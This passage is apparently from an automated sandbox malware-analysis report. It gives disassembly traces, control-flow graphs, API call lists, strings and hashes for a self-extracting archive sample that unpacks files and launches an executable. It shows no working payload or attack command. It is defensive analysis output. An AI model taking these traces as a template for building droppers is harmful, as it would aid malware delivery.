                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                                                                              • API String ID: 3445078344-2238251102
                                                                                                                                                                                              • Opcode ID: e2302f3f352eb2c583e782a5aae0a2120ef87cda73970c47f2abd7784d736b7e
                                                                                                                                                                                              • Instruction ID: fb55e69740b7a9d5ef377fc11df44a7f4a1842c5c6277e310186aaf95b0351bc
                                                                                                                                                                                              • Opcode Fuzzy Hash: e2302f3f352eb2c583e782a5aae0a2120ef87cda73970c47f2abd7784d736b7e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1542F671D44248BEEB22EBB19C4AFFE3B6CAB01710F044055F644AA1D2CBB99945FF61

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 268 fb0863-fb0886 call fbec50 GetModuleHandleW 271 fb0888-fb089f GetProcAddress 268->271 272 fb08e7-fb0b48 268->272 275 fb08b9-fb08c9 GetProcAddress 271->275 276 fb08a1-fb08b7 271->276 273 fb0b4e-fb0b59 call fc75fb 272->273 274 fb0c14-fb0c40 GetModuleFileNameW call fac29a call fb0602 272->274 273->274 286 fb0b5f-fb0b8d GetModuleFileNameW CreateFileW 273->286 292 fb0c42-fb0c4e call fab146 274->292 277 fb08cb-fb08e0 275->277 278 fb08e5 275->278 276->275 277->278 278->272 288 fb0c08-fb0c0f CloseHandle 286->288 289 fb0b8f-fb0b9b SetFilePointer 286->289 288->274 289->288 290 fb0b9d-fb0bb9 ReadFile 289->290 290->288 293 fb0bbb-fb0be0 290->293 297 fb0c7d-fb0ca4 call fac310 GetFileAttributesW 292->297 298 fb0c50-fb0c5b call fb081b 292->298 296 fb0bfd-fb0c06 call fb0371 293->296 296->288 305 fb0be2-fb0bfc call fb081b 296->305 308 fb0cae 297->308 309 fb0ca6-fb0caa 297->309 298->297 307 fb0c5d-fb0c7b CompareStringW 298->307 305->296 307->297 307->309 312 fb0cb0-fb0cb5 308->312 309->292 311 fb0cac 309->311 311->312 313 fb0cec-fb0cee 312->313 314 fb0cb7 312->314 315 fb0dfb-fb0e05 313->315 316 fb0cf4-fb0d0b call fac2e4 call fab146 313->316 317 fb0cb9-fb0ce0 call fac310 GetFileAttributesW 314->317 327 fb0d0d-fb0d6e call fb081b * 2 call fae617 call fa4092 call fae617 call fba7e4 316->327 328 fb0d73-fb0da6 call fa4092 AllocConsole 316->328 322 fb0cea 317->322 323 fb0ce2-fb0ce6 317->323 322->313 323->317 325 fb0ce8 323->325 325->313 334 fb0df3-fb0df5 ExitProcess 327->334 333 fb0da8-fb0ded GetCurrentProcessId AttachConsole call fc3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00FB087C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FB088E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FB08BF
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FB0B69
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB0B83
                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FB0B93
                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00FD3C7C,00000000), ref: 00FB0BB1
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FB0C09
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FB0C1E
                                                                                                                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00FD3C7C,?,00000000,?,00000800), ref: 00FB0C72
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00FD3C7C,00000800,?,00000000,?,00000800), ref: 00FB0C9C
                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00FD3D44,00000800), ref: 00FB0CD8
                                                                                                                                                                                                • Part of subcall function 00FB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FB0836
                                                                                                                                                                                                • Part of subcall function 00FB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FAF2D8,Crypt32.dll,00000000,00FAF35C,?,?,00FAF33E,?,?,?), ref: 00FB0858
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FB0D4A
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FB0D96
                                                                                                                                                                                                • Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5
                                                                                                                                                                                              • AllocConsole.KERNEL32 ref: 00FB0D9E
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00FB0DA8
                                                                                                                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00FB0DAF
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FB0DC4
                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00FB0DD5
                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00FB0DDC
                                                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 00FB0DE7
                                                                                                                                                                                              • FreeConsole.KERNEL32 ref: 00FB0DED
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00FB0DF5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                                                              • API String ID: 1207345701-3298887752
                                                                                                                                                                                              • Opcode ID: 252dc802b3570be85327090c8f6c5146579e228a6ebcd92b55580c3c0f0343b9
                                                                                                                                                                                              • Instruction ID: 7547a19c88db13223e0000d5e55a5a269a652a7fa68b8cc1ffe6be1eb82bad1f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 252dc802b3570be85327090c8f6c5146579e228a6ebcd92b55580c3c0f0343b9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9ED193B1408388ABD3219F60884DBDFBBEABF85704F54491EF28596351CB749648EF63

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 347 fbc73f-fbc757 call fbeb78 call fbec50 352 fbd40d-fbd418 347->352 353 fbc75d-fbc787 call fbb314 347->353 353->352 356 fbc78d-fbc792 353->356 357 fbc793-fbc7a1 356->357 358 fbc7a2-fbc7b7 call fbaf98 357->358 361 fbc7b9 358->361 362 fbc7bb-fbc7d0 call fb1fbb 361->362 365 fbc7dd-fbc7e0 362->365 366 fbc7d2-fbc7d6 362->366 368 fbd3d9-fbd404 call fbb314 365->368 369 fbc7e6 365->369 366->362 367 fbc7d8 366->367 367->368 368->357 384 fbd40a-fbd40c 368->384 370 fbca5f-fbca61 369->370 371 fbc9be-fbc9c0 369->371 372 fbc7ed-fbc7f0 369->372 373 fbca7c-fbca7e 369->373 370->368 375 fbca67-fbca77 SetWindowTextW 370->375 371->368 377 fbc9c6-fbc9d2 371->377 372->368 378 fbc7f6-fbc850 call fba64d call fabdf3 call faa544 call faa67e call fa6edb 372->378 373->368 376 fbca84-fbca8b 373->376 375->368 376->368 380 fbca91-fbcaaa 376->380 381 fbc9e6-fbc9eb 377->381 382 fbc9d4-fbc9e5 call fc7686 377->382 433 fbc98f-fbc9a4 call faa5d1 378->433 385 fbcaac 380->385 386 fbcab2-fbcac0 call fc3e13 380->386 389 fbc9ed-fbc9f3 381->389 390 fbc9f5-fbca00 call fbb48e 381->390 382->381 384->352 385->386 386->368 403 fbcac6-fbcacf 386->403 394 fbca05-fbca07 389->394 390->394 399 fbca09-fbca10 call fc3e13 394->399 400 fbca12-fbca32 call fc3e13 call fc3e3e 394->400 399->400 421 fbca4b-fbca4d 400->421 422 fbca34-fbca3b 400->422 407 fbcaf8-fbcafb 403->407 408 fbcad1-fbcad5 403->408 410 fbcb01-fbcb04 407->410 411 fbcbe0-fbcbee call fb0602 407->411 408->410 413 fbcad7-fbcadf 408->413 415 fbcb11-fbcb2c 410->415 416 fbcb06-fbcb0b 410->416 431 fbcbf0-fbcc04 call fc279b 411->431 413->368 419 fbcae5-fbcaf3 call fb0602 413->419 434 fbcb2e-fbcb68 415->434 435 fbcb76-fbcb7d 415->435 416->411 416->415 419->431 421->368 430 fbca53-fbca5a call fc3e2e 421->430 428 fbca3d-fbca3f 422->428 429 fbca42-fbca4a call fc7686 422->429 428->429 429->421 430->368 446 fbcc11-fbcc62 call fb0602 call fbb1be GetDlgItem SetWindowTextW SendMessageW call fc3e49 431->446 447 fbcc06-fbcc0a 431->447 451 fbc9aa-fbc9b9 call faa55a 433->451 452 fbc855-fbc869 SetFileAttributesW 433->452 470 fbcb6a 434->470 471 fbcb6c-fbcb6e 434->471 440 fbcbab-fbcbce call fc3e13 * 2 435->440 441 fbcb7f-fbcb97 call fc3e13 435->441 440->431 475 fbcbd0-fbcbde call fb05da 440->475 441->440 457 fbcb99-fbcba6 call fb05da 441->457 481 fbcc67-fbcc6b 446->481 447->446 453 fbcc0c-fbcc0e 447->453 451->368 459 fbc90f-fbc91f GetFileAttributesW 452->459 460 fbc86f-fbc8a2 call fab991 call fab690 call fc3e13 452->460 453->446 457->440 459->433 468 fbc921-fbc930 DeleteFileW 459->468 490 fbc8b5-fbc8c3 call fabdb4 460->490 491 fbc8a4-fbc8b3 call fc3e13 460->491 468->433 474 fbc932-fbc935 468->474 470->471 471->435 478 fbc939-fbc965 call fa4092 GetFileAttributesW 474->478 475->431 488 fbc937-fbc938 478->488 489 fbc967-fbc97d MoveFileW 478->489 481->368 485 fbcc71-fbcc85 SendMessageW 481->485 485->368 488->478 489->433 492 fbc97f-fbc989 MoveFileExW 489->492 490->451 497 fbc8c9-fbc908 call fc3e13 call fbfff0 490->497 491->490 491->497 492->433 497->459
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FBC744
                                                                                                                                                                                                • Part of subcall function 00FBB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00FBB3FB
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FBCA0A
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FBCA13
                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00FBCA71
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FBCAB3
                                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00FBCBFB
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00FBCC36
                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00FBCC46
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00FEA472), ref: 00FBCC54
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FBCC7F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                              • API String ID: 2804936435-312220925
                                                                                                                                                                                              • Opcode ID: ff0f19bf14259db9e81b812be6ba5fb3988eeea00455c50316fe73a76dcb50b4
                                                                                                                                                                                              • Instruction ID: 53023e39e1089c9ee4cf2230b0ce9144da2bf5d4ae8f535efbe796d16795e891
                                                                                                                                                                                              • Opcode Fuzzy Hash: ff0f19bf14259db9e81b812be6ba5fb3988eeea00455c50316fe73a76dcb50b4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DE183B2D00119AADF25DBA1DD95EEF77BCAF04350F0480A6F609E7041EB789E44AF61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FADA70
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FADAAC
                                                                                                                                                                                                • Part of subcall function 00FAC29A: _wcslen.LIBCMT ref: 00FAC2A2
                                                                                                                                                                                                • Part of subcall function 00FB05DA: _wcslen.LIBCMT ref: 00FB05E0
                                                                                                                                                                                                • Part of subcall function 00FB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FABAE9,00000000,?,?,?,00010416), ref: 00FB1BA0
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FADDE9
                                                                                                                                                                                              • __fprintf_l.LIBCMT ref: 00FADF1C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                                                                              • API String ID: 566448164-801612888
                                                                                                                                                                                              • Opcode ID: 1e128f7586fc2735d2b635173acf323b0d6f7e1a2044ebb09f9aae665a1e86b4
                                                                                                                                                                                              • Instruction ID: f1f3ca9d232522d0ab8a5182d3d0f60503d4a2742f53ad5874145ac335e5d21d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e128f7586fc2735d2b635173acf323b0d6f7e1a2044ebb09f9aae665a1e86b4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8232F3B29002199BCF24EF64CC42BEE77A9FF06310F44452AF90697291EBB5DD84EB50

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBB579
                                                                                                                                                                                                • Part of subcall function 00FBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB58A
                                                                                                                                                                                                • Part of subcall function 00FBB568: IsDialogMessageW.USER32(00010416,?), ref: 00FBB59E
                                                                                                                                                                                                • Part of subcall function 00FBB568: TranslateMessage.USER32(?), ref: 00FBB5AC
                                                                                                                                                                                                • Part of subcall function 00FBB568: DispatchMessageW.USER32(?), ref: 00FBB5B6
                                                                                                                                                                                              • GetDlgItem.USER32(00000068,00FFFCB8), ref: 00FBD4E8
                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00FBAF07,00000001,?,?,00FBB7B9,00FD506C,00FFFCB8,00FFFCB8,00001000,00000000,00000000), ref: 00FBD510
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FBD51B
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00FD35F4), ref: 00FBD529
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FBD53F
                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FBD559
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FBD59D
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FBD5AB
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FBD5BA
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FBD5E1
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00FD43F4), ref: 00FBD5F0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                              • API String ID: 3569833718-2967466578
                                                                                                                                                                                              • Opcode ID: 572df2e4eb4c867db881a4b97f40af47e1435b0f394d98d5ebc47ea0c9733281
                                                                                                                                                                                              • Instruction ID: ea7b8e9a817eac1ff2d5c5c429a10cc7a841d8d3e25730fe2a5210cbd1b84fe6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 572df2e4eb4c867db881a4b97f40af47e1435b0f394d98d5ebc47ea0c9733281
                                                                                                                                                                                              • Instruction Fuzzy Hash: FC31E471145346AFE322DF20DC5AFAB7FACFB86314F000518F5919A1C0EB7989059BB6

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 836 fbd78f-fbd7a7 call fbec50 839 fbd9e8-fbd9f0 836->839 840 fbd7ad-fbd7b9 call fc3e13 836->840 840->839 843 fbd7bf-fbd7e7 call fbfff0 840->843 846 fbd7e9 843->846 847 fbd7f1-fbd7ff 843->847 846->847 848 fbd812-fbd818 847->848 849 fbd801-fbd804 847->849 851 fbd85b-fbd85e 848->851 850 fbd808-fbd80e 849->850 852 fbd810 850->852 853 fbd837-fbd844 850->853 851->850 854 fbd860-fbd866 851->854 855 fbd822-fbd82c 852->855 856 fbd84a-fbd84e 853->856 857 fbd9c0-fbd9c2 853->857 858 fbd868-fbd86b 854->858 859 fbd86d-fbd86f 854->859 860 fbd81a-fbd820 855->860 861 fbd82e 855->861 862 fbd9c6 856->862 863 fbd854-fbd859 856->863 857->862 858->859 864 fbd882-fbd898 call fab92d 858->864 859->864 865 fbd871-fbd878 859->865 860->855 867 fbd830-fbd833 860->867 861->853 870 fbd9cf 862->870 863->851 871 fbd89a-fbd8a7 call fb1fbb 864->871 872 fbd8b1-fbd8bc call faa231 864->872 865->864 868 fbd87a 865->868 867->853 868->864 873 fbd9d6-fbd9d8 870->873 871->872 881 fbd8a9 871->881 882 fbd8d9-fbd8e6 ShellExecuteExW 872->882 883 fbd8be-fbd8d5 call fab6c4 872->883 876 fbd9da-fbd9dc 873->876 877 fbd9e7 873->877 876->877 880 fbd9de-fbd9e1 ShowWindow 876->880 877->839 880->877 881->872 882->877 885 fbd8ec-fbd8f9 882->885 883->882 887 fbd8fb-fbd902 885->887 888 fbd90c-fbd90e 885->888 887->888 889 fbd904-fbd90a 887->889 890 fbd910-fbd919 888->890 891 fbd925-fbd944 call fbdc3b 888->891 889->888 892 fbd97b-fbd987 CloseHandle 889->892 890->891 899 fbd91b-fbd923 ShowWindow 890->899 891->892 905 fbd946-fbd94e 891->905 893 fbd989-fbd996 call fb1fbb 892->893 894 fbd998-fbd9a6 892->894 893->870 893->894 894->873 898 fbd9a8-fbd9aa 894->898 898->873 902 fbd9ac-fbd9b2 898->902 899->891 902->873 904 fbd9b4-fbd9be 902->904 904->873 905->892 906 fbd950-fbd961 GetExitCodeProcess 905->906 906->892 907 fbd963-fbd96d 906->907 908 fbd96f 907->908 909 fbd974 907->909 908->909 909->892
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FBD7AE
                                                                                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00FBD8DE
                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00FBD91D
                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00FBD959
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FBD97F
                                                                                                                                                                                              • ShowWindow.USER32(?,00000001), ref: 00FBD9E1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                                                                              • String ID: .exe$.inf
                                                                                                                                                                                              • API String ID: 36480843-3750412487
                                                                                                                                                                                              • Opcode ID: 7188ebdb399f63fa46d61d31049be5f99a10628d947674bb10b0a5cb08572ffe
                                                                                                                                                                                              • Instruction ID: ea492fc948bd084ed040ca2d8d0d9197d8f9f10edaffcd3d4242887f13bd49a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7188ebdb399f63fa46d61d31049be5f99a10628d947674bb10b0a5cb08572ffe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0251E1709043849AEB319B269844BEBBBE5AF82764F08041EF5C097191F775C948FF53

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 910 fca95b-fca974 911 fca98a-fca98f 910->911 912 fca976-fca986 call fcef4c 910->912 914 fca99c-fca9c0 MultiByteToWideChar 911->914 915 fca991-fca999 911->915 912->911 922 fca988 912->922 916 fca9c6-fca9d2 914->916 917 fcab53-fcab66 call fbfbbc 914->917 915->914 919 fca9d4-fca9e5 916->919 920 fcaa26 916->920 923 fcaa04-fcaa15 call fc8e06 919->923 924 fca9e7-fca9f6 call fd2010 919->924 926 fcaa28-fcaa2a 920->926 922->911 929 fcab48 923->929 937 fcaa1b 923->937 924->929 936 fca9fc-fcaa02 924->936 926->929 930 fcaa30-fcaa43 MultiByteToWideChar 926->930 934 fcab4a-fcab51 call fcabc3 929->934 930->929 933 fcaa49-fcaa5b call fcaf6c 930->933 939 fcaa60-fcaa64 933->939 934->917 941 fcaa21-fcaa24 936->941 937->941 939->929 942 fcaa6a-fcaa71 939->942 941->926 943 fcaaab-fcaab7 942->943 944 fcaa73-fcaa78 942->944 946 fcaab9-fcaaca 943->946 947 fcab03 943->947 944->934 945 fcaa7e-fcaa80 944->945 945->929 948 fcaa86-fcaaa0 call fcaf6c 945->948 950 fcaacc-fcaadb call fd2010 946->950 951 fcaae5-fcaaf6 call fc8e06 946->951 949 fcab05-fcab07 947->949 948->934 963 fcaaa6 948->963 953 fcab09-fcab22 call fcaf6c 949->953 954 fcab41-fcab47 call fcabc3 949->954 950->954 966 fcaadd-fcaae3 950->966 951->954 962 fcaaf8 951->962 953->954 968 fcab24-fcab2b 953->968 954->929 967 fcaafe-fcab01 962->967 963->929 966->967 967->949 969 fcab2d-fcab2e 968->969 970 fcab67-fcab6d 968->970 971 fcab2f-fcab3f WideCharToMultiByte 969->971 970->971 971->954 972 fcab6f-fcab76 call fcabc3 971->972 972->934
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FC5695,00FC5695,?,?,?,00FCABAC,00000001,00000001,2DE85006), ref: 00FCA9B5
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FCABAC,00000001,00000001,2DE85006,?,?,?), ref: 00FCAA3B
